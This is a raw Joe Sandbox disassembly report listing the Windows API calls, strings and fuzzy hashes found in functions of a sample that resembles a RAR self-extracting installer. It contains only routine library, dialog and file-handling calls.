                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C7D2
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C7E4
                                                                                                      • Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C7F6
                                                                                                    • _free.LIBCMT ref: 00E2CB5B
                                                                                                      • Part of subcall function 00E28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?), ref: 00E28DE2
                                                                                                      • Part of subcall function 00E28DCC: GetLastError.KERNEL32(?,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?,?), ref: 00E28DF4
                                                                                                    • _free.LIBCMT ref: 00E2CB7D
                                                                                                    • _free.LIBCMT ref: 00E2CB92
                                                                                                    • _free.LIBCMT ref: 00E2CB9D
                                                                                                    • _free.LIBCMT ref: 00E2CBBF
                                                                                                    • _free.LIBCMT ref: 00E2CBD2
                                                                                                    • _free.LIBCMT ref: 00E2CBE0
                                                                                                    • _free.LIBCMT ref: 00E2CBEB
                                                                                                    • _free.LIBCMT ref: 00E2CC23
                                                                                                    • _free.LIBCMT ref: 00E2CC2A
                                                                                                    • _free.LIBCMT ref: 00E2CC47
                                                                                                    • _free.LIBCMT ref: 00E2CC5F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                    • String ID: h
                                                                                                    • API String ID: 161543041-3415971826
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00E29705
                                                                                                      • Part of subcall function 00E28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?), ref: 00E28DE2
                                                                                                      • Part of subcall function 00E28DCC: GetLastError.KERNEL32(?,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?,?), ref: 00E28DF4
                                                                                                    • _free.LIBCMT ref: 00E29711
                                                                                                    • _free.LIBCMT ref: 00E2971C
                                                                                                    • _free.LIBCMT ref: 00E29727
                                                                                                    • _free.LIBCMT ref: 00E29732
                                                                                                    • _free.LIBCMT ref: 00E2973D
                                                                                                    • _free.LIBCMT ref: 00E29748
                                                                                                    • _free.LIBCMT ref: 00E29753
                                                                                                    • _free.LIBCMT ref: 00E2975E
                                                                                                    • _free.LIBCMT ref: 00E2976C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID: 0d
                                                                                                    • API String ID: 776569668-2809447700
                                                                                                    • Opcode ID: 36cd2f1bebeacf48050df412a08e2f4527b890af362c2fa22234e896a2029913
                                                                                                    • Instruction ID: aaa786101eb9ab237b73cfa9834fce209f6a14f6862f2876de2711b7eb647d6b
                                                                                                    • Opcode Fuzzy Hash: 36cd2f1bebeacf48050df412a08e2f4527b890af362c2fa22234e896a2029913
                                                                                                    • Instruction Fuzzy Hash: 8311D476111019BFDB01EF54EA42CD93BB9EF14350B1168A1FA08AF272DE32DA549B84
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00E19736
                                                                                                    • _wcslen.LIBCMT ref: 00E197D6
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00E197E5
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00E19806
                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E1982D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                    • String ID: Fjun$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                    • API String ID: 1777411235-1684715023
                                                                                                    • Opcode ID: b57343b8f7932f6c4ac20037a8a27bb6b30b1e84ae09b7022b0a077065a50c37
                                                                                                    • Instruction ID: 2cb2d5271c2c0bbe8eae7ced828650c91bc111a54ca9bbc6da3ed26c1302e9e6
                                                                                                    • Opcode Fuzzy Hash: b57343b8f7932f6c4ac20037a8a27bb6b30b1e84ae09b7022b0a077065a50c37
                                                                                                    • Instruction Fuzzy Hash: 6C3128725083157EE725AF34AC06FABBBD89F42710F14211EF501B61D3EB74DA8983A6
                                                                                                    APIs
                                                                                                    • GetWindow.USER32(?,00000005), ref: 00E1D6C1
                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 00E1D6ED
                                                                                                      • Part of subcall function 00E11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E0C116,00000000,.exe,?,?,00000800,?,?,?,00E18E3C), ref: 00E11FD1
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00E1D709
                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00E1D720
                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00E1D734
                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00E1D75D
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00E1D764
                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00E1D76D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                    • String ID: STATIC
                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                    • Opcode ID: f2785498f69e3f593f07fb87e1db6b24381ba917a640fa27b9cf0748a33afe11
                                                                                                    • Instruction ID: ba3848b751c7d0014f85fc436f02ec1e7c11be61a6fe9028be31351372afb176
                                                                                                    • Opcode Fuzzy Hash: f2785498f69e3f593f07fb87e1db6b24381ba917a640fa27b9cf0748a33afe11
                                                                                                    • Instruction Fuzzy Hash: AC113A726053107FE2206B71AC4AFEF769CAF54751F006121FA51F10D2D6A48E8942B5
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                    • String ID: csm$csm$csm
                                                                                                    • API String ID: 322700389-393685449
                                                                                                    • Opcode ID: 418950f48319588771404cf2bc39e1219f1a66e01714813af55445039f9c4a97
                                                                                                    • Instruction ID: 1828c3301a55e9effccb4cff0b9081762d99ee963d84cfb3b392d61d0179bbb9
                                                                                                    • Opcode Fuzzy Hash: 418950f48319588771404cf2bc39e1219f1a66e01714813af55445039f9c4a97
                                                                                                    • Instruction Fuzzy Hash: 29B19A71900229EFCF29DFA4E9819AEBBB5FF04314F14615AE9017B212C739DA61CF91
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n
                                                                                                    • API String ID: 3519838083-140586453
                                                                                                    • Opcode ID: 32f652d08f2f1aaf256392c8645c75753c74f82a29fdc0348eb992ac2ce135c0
                                                                                                    • Instruction ID: bb146b444d5120ad21e33e14e4d3da29632b10e8f77e662ad2f5c699f0c97a10
                                                                                                    • Opcode Fuzzy Hash: 32f652d08f2f1aaf256392c8645c75753c74f82a29fdc0348eb992ac2ce135c0
                                                                                                    • Instruction Fuzzy Hash: BE716C71A00219EFDB14DFA5CC99DAFBBB9FF48714B041169E512B72A0CB30AD85CB50
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E06FAA
                                                                                                    • _wcslen.LIBCMT ref: 00E07013
                                                                                                    • _wcslen.LIBCMT ref: 00E07084
                                                                                                      • Part of subcall function 00E07A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E07AAB
                                                                                                      • Part of subcall function 00E07A9C: GetLastError.KERNEL32 ref: 00E07AF1
                                                                                                      • Part of subcall function 00E07A9C: CloseHandle.KERNEL32(?), ref: 00E07B00
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                    • API String ID: 3122303884-3508440684
                                                                                                    • Opcode ID: fca2e4654284c3899af02fd732df59017a96b04c8d746dd8421aad1f581c29c6
                                                                                                    • Instruction ID: df85b64624eaf8c49653e2ef43206481c997da8cc5ee8b305a20fbae6d779597
                                                                                                    • Opcode Fuzzy Hash: fca2e4654284c3899af02fd732df59017a96b04c8d746dd8421aad1f581c29c6
                                                                                                    • Instruction Fuzzy Hash: 8241C5B1D08348AAEB30E7709C86FEEB7AC9F04304F046555FA95B61C2D674BAC8C761
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
                                                                                                      • Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E1B610
                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00E1B637
                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00E1B650
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00E1B661
                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 00E1B66A
                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00E1B67E
                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00E1B694
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                    • String ID: LICENSEDLG
                                                                                                    • API String ID: 3214253823-2177901306
                                                                                                    • Opcode ID: 51dbdd8053dfb0350bfb56e25a294a7c913ecbffbfc8f4305e9952691eeb9daa
                                                                                                    • Instruction ID: e08a5b9f81b4768370f3b583978824f2f69402c97ea686c543473e24985daf3e
                                                                                                    • Opcode Fuzzy Hash: 51dbdd8053dfb0350bfb56e25a294a7c913ecbffbfc8f4305e9952691eeb9daa
                                                                                                    • Instruction Fuzzy Hash: F621E532604204BFD211AF77FD4AFBB3B6DEB56B85F011014F601B60A1CBA2A9499635
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,4BBE8E55,00000001,00000000,00000000,?,?,00E0AF6C,ROOT\CIMV2), ref: 00E1FD99
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00E0AF6C,ROOT\CIMV2), ref: 00E1FE14
                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00E1FE1F
                                                                                                    • _com_issue_error.COMSUPP ref: 00E1FE48
                                                                                                    • _com_issue_error.COMSUPP ref: 00E1FE52
                                                                                                    • GetLastError.KERNEL32(80070057,4BBE8E55,00000001,00000000,00000000,?,?,00E0AF6C,ROOT\CIMV2), ref: 00E1FE57
                                                                                                    • _com_issue_error.COMSUPP ref: 00E1FE6A
                                                                                                    • GetLastError.KERNEL32(00000000,?,?,00E0AF6C,ROOT\CIMV2), ref: 00E1FE80
                                                                                                    • _com_issue_error.COMSUPP ref: 00E1FE93
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                    • String ID:
                                                                                                    • API String ID: 1353541977-0
                                                                                                    • Opcode ID: 029120cf3cd88e59b1748a812a924a35513374e197170e1ee3164986d7176161
                                                                                                    • Instruction ID: f6afa4ecca403ae820c4f01a7835216c9ea75e5934949881facadce4e02c2871
                                                                                                    • Opcode Fuzzy Hash: 029120cf3cd88e59b1748a812a924a35513374e197170e1ee3164986d7176161
                                                                                                    • Instruction Fuzzy Hash: DA41F871A00219AFCB109F65DC49BEEBBE8EB44724F105239F905F7291D7349984CBE4
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E09387
                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00E093AA
                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00E093C9
                                                                                                      • Part of subcall function 00E0C29A: _wcslen.LIBCMT ref: 00E0C2A2
                                                                                                      • Part of subcall function 00E11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E0C116,00000000,.exe,?,?,00000800,?,?,?,00E18E3C), ref: 00E11FD1
                                                                                                    • _swprintf.LIBCMT ref: 00E09465
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00E094D4
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00E09514
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                    • String ID: rtmp%d
                                                                                                    • API String ID: 3726343395-3303766350
                                                                                                    • Opcode ID: 7372d171d2d7af465a9f136013cd5d1ecedc9e214fa1ddaa0a75410e1a1abc6d
                                                                                                    • Instruction ID: 2e640fd0ef8504aea6f2e957da88a6b7c981b645d311ecbc0f2e96b41db5f55a
                                                                                                    • Opcode Fuzzy Hash: 7372d171d2d7af465a9f136013cd5d1ecedc9e214fa1ddaa0a75410e1a1abc6d
                                                                                                    • Instruction Fuzzy Hash: 364154B1900258A6DF21AFA1CC45EDE73BCEF45344F0458A5B649F3093DB388BC99B60
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: U$p$z
                                                                                                    • API String ID: 176396367-3999876168
                                                                                                    • Opcode ID: ad451484344a2c5bd3230ca798f37891d6633c9e6f605ebb48c7afa9b3979a32
                                                                                                    • Instruction ID: 025529ee7e44960707c79f1086fe0f52c6e488a5ba15bdb76846159cdd503367
                                                                                                    • Opcode Fuzzy Hash: ad451484344a2c5bd3230ca798f37891d6633c9e6f605ebb48c7afa9b3979a32
                                                                                                    • Instruction Fuzzy Hash: CD41D8719006699FCB219F789C099DF7BB8EF01350F040059FD45F7256DB74AE898BA1
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00E19EEE
                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00E19F44
                                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00E19FDB
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00E19FE3
                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00E19FF9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Show$RectText
                                                                                                    • String ID: $RarHtmlClassName
                                                                                                    • API String ID: 3937224194-266247588
                                                                                                    • Opcode ID: 41bb1d263377bef9eb053d771da04d9863d0e2ee4c9e4ca49deba479cbab3b89
                                                                                                    • Instruction ID: dbb31464e685415b460fca9befd0b4cf451abf005c2daf7638936bb28ffcc558
                                                                                                    • Opcode Fuzzy Hash: 41bb1d263377bef9eb053d771da04d9863d0e2ee4c9e4ca49deba479cbab3b89
                                                                                                    • Instruction Fuzzy Hash: CB41FF32105310AFCB215F75AC48BABBBA8FF49785F045568F849BA053CB74DA89CB61
                                                                                                    APIs
                                                                                                    • __aulldiv.LIBCMT ref: 00E1122E
                                                                                                      • Part of subcall function 00E0B146: GetVersionExW.KERNEL32(?), ref: 00E0B16B
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00E11251
                                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00E11263
                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00E11274
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E11284
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E11294
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00E112CF
                                                                                                    • __aullrem.LIBCMT ref: 00E11379
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1247370737-0
                                                                                                    • Opcode ID: 6b165fedf88ccc3fdab2ce3e1e9147c075609d8e31c03c1718015a2bfdff9951
                                                                                                    • Instruction ID: a209a5dd2250934684e1d2d0bf034b80fdbd6558f9c510e64afa3f176c4fb532
                                                                                                    • Opcode Fuzzy Hash: 6b165fedf88ccc3fdab2ce3e1e9147c075609d8e31c03c1718015a2bfdff9951
                                                                                                    • Instruction Fuzzy Hash: 734109B1508305AFC710DF65C8849ABBBF9FF88314F00992EF596D2650E738E649CB52
                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 00E02536
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                      • Part of subcall function 00E105DA: _wcslen.LIBCMT ref: 00E105E0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                    • API String ID: 3053425827-2277559157
                                                                                                    • Opcode ID: abcf9d0524055003369af6555e6bde342b055a347e4a100a81c64e745497e2e0
                                                                                                    • Instruction ID: 7f1ce6a08698f557d89f07f0830eab1e3654342b264d9d851b97681f11fd01d6
                                                                                                    • Opcode Fuzzy Hash: abcf9d0524055003369af6555e6bde342b055a347e4a100a81c64e745497e2e0
                                                                                                    • Instruction Fuzzy Hash: 8EF106706043409BDB15DB24C4D9BEE77D99B94304F08666DEE8ABB2C3CB6489C5C762
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                                    • API String ID: 176396367-3568243669
                                                                                                    • Opcode ID: 9c89580defa3df769baa6e08f2ad4e35e275bc023303455351f4f4900a2f8ee3
                                                                                                    • Instruction ID: 11749c42ec30045879fc6a00842b4bd43a89b872b7f9575dea3f447eb8b5d52e
                                                                                                    • Opcode Fuzzy Hash: 9c89580defa3df769baa6e08f2ad4e35e275bc023303455351f4f4900a2f8ee3
                                                                                                    • Instruction Fuzzy Hash: 54512C7674032395DB309A25E8317F673E0EFA1754F59241AF9C1BB1C2FB658CC18261
                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00E2FE02,00000000,00000000,00000000,00000000,00000000,00E2529F), ref: 00E2F6CF
                                                                                                    • __fassign.LIBCMT ref: 00E2F74A
                                                                                                    • __fassign.LIBCMT ref: 00E2F765
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00E2F78B
                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,00E2FE02,00000000,?,?,?,?,?,?,?,?,?,00E2FE02,00000000), ref: 00E2F7AA
                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,00E2FE02,00000000,?,?,?,?,?,?,?,?,?,00E2FE02,00000000), ref: 00E2F7E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
                                                                                                    • Opcode ID: eaadb2199378b971a99b5094c8819c00b8a485b1fbcc04e4baade0a8c5943c28
                                                                                                    • Instruction ID: 35331832bbfb9253dc18ced57c065d52847b663d2c169a9a98e9c424eba2a62b
                                                                                                    • Opcode Fuzzy Hash: eaadb2199378b971a99b5094c8819c00b8a485b1fbcc04e4baade0a8c5943c28
                                                                                                    • Instruction Fuzzy Hash: 9E5182B1D002599FCB14CFA8EC85AEEFBF4EF09300F14516AE555F7251E670AA45CBA0
                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 00E1CE9D
                                                                                                      • Part of subcall function 00E0B690: _wcslen.LIBCMT ref: 00E0B696
                                                                                                    • _swprintf.LIBCMT ref: 00E1CED1
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                    • SetDlgItemTextW.USER32(?,00000066,00E4946A), ref: 00E1CEF1
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E1CF22
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E1CFFE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                                    • String ID: %s%s%u
                                                                                                    • API String ID: 689974011-1360425832
                                                                                                    • Opcode ID: 0da56fedebf108353ad5e90e21a135c410f5e3122c7fb9384f9efde6f8e26877
                                                                                                    • Instruction ID: 7c5c3480be94be314ff6b5af973987cee2843adf733430c625e8ad23d3b78785
                                                                                                    • Opcode Fuzzy Hash: 0da56fedebf108353ad5e90e21a135c410f5e3122c7fb9384f9efde6f8e26877
                                                                                                    • Instruction Fuzzy Hash: F64191B1940658AADF219B60DC45FEE77FDEB05344F4090A6FA09F7081EAB48AC5CF61
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E22937
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00E2293F
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E229C8
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00E229F3
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E22A48
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                    • Opcode ID: 14479ddc65f19adcb9b770870e6e17736981610071dfc5e0da64a061ee13f225
                                                                                                    • Instruction ID: 3c59429e2cb994c311667c93e361b7ffd4aac7c9e22e07167b35b483c5c56020
                                                                                                    • Opcode Fuzzy Hash: 14479ddc65f19adcb9b770870e6e17736981610071dfc5e0da64a061ee13f225
                                                                                                    • Instruction Fuzzy Hash: F441C034A00228AFCF14DF28D885A9EBFF1AF45328F149069E915BB392D731DA45CF90
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                    • API String ID: 176396367-3743748572
                                                                                                    • Opcode ID: e7d163dca7c0ac27bfea725032184313fa5bbfdf05b426eee7a1849e05e849c1
                                                                                                    • Instruction ID: 9a2cdcfd5078d1f8860e6abed9217e889dc584e6fcb0bf3eade6ead46dca5158
                                                                                                    • Opcode Fuzzy Hash: e7d163dca7c0ac27bfea725032184313fa5bbfdf05b426eee7a1849e05e849c1
                                                                                                    • Instruction Fuzzy Hash: 2631693264434556DA30AF90AC12BFA73E4EF80724F60541EF482772C2FA64AEC883A1
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E2C868: _free.LIBCMT ref: 00E2C891
                                                                                                    • _free.LIBCMT ref: 00E2C8F2
                                                                                                      • Part of subcall function 00E28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?), ref: 00E28DE2
                                                                                                      • Part of subcall function 00E28DCC: GetLastError.KERNEL32(?,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?,?), ref: 00E28DF4
                                                                                                    • _free.LIBCMT ref: 00E2C8FD
                                                                                                    • _free.LIBCMT ref: 00E2C908
                                                                                                    • _free.LIBCMT ref: 00E2C95C
                                                                                                    • _free.LIBCMT ref: 00E2C967
                                                                                                    • _free.LIBCMT ref: 00E2C972
